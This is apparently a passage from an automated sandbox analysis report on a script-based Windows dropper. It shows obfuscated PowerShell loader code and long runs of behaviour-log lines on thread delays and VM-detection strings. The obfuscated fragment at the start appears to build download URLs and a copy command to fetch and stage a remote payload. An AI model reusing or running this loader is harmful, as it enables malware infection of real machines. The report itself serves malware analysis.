Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB0C7A push cs; retf 7_2_07CB0E66
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CBB468 push FFFFFF8Bh; iretd 7_2_07CBB46B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CBB42F push FFFFFF8Bh; iretd 7_2_07CBB432
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB503A push eax; retf 7_2_07CB5046
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB9F54 push FFFFFF8Bh; iretd 7_2_07CB9F5D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB0E67 push eax; mov dword ptr [esp], ecx7_2_07CB0E7C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB0E67 push cs; retf 7_2_07CB0EE6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB8E1F push FFFFFF8Bh; iretd 7_2_07CB8E22
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB2E27 push FFFFFF8Bh; iretd 7_2_07CB2E30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB2DEB push FFFFFF8Bh; iretd 7_2_07CB2DF4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB1C80 push ds; retf 7_2_07CB1EFE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07CB9C46 pushfd ; retf 7_2_07CB9C4E
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3980Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5935Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7327Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2275Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 5676Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 7327 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 2275 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.2136621803.0000021ADDAF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136621803.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037745545.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135563015.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032524034.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136388867.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2134467143.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2134759951.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033005568.0000021ADBBC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135796132.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135299220.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
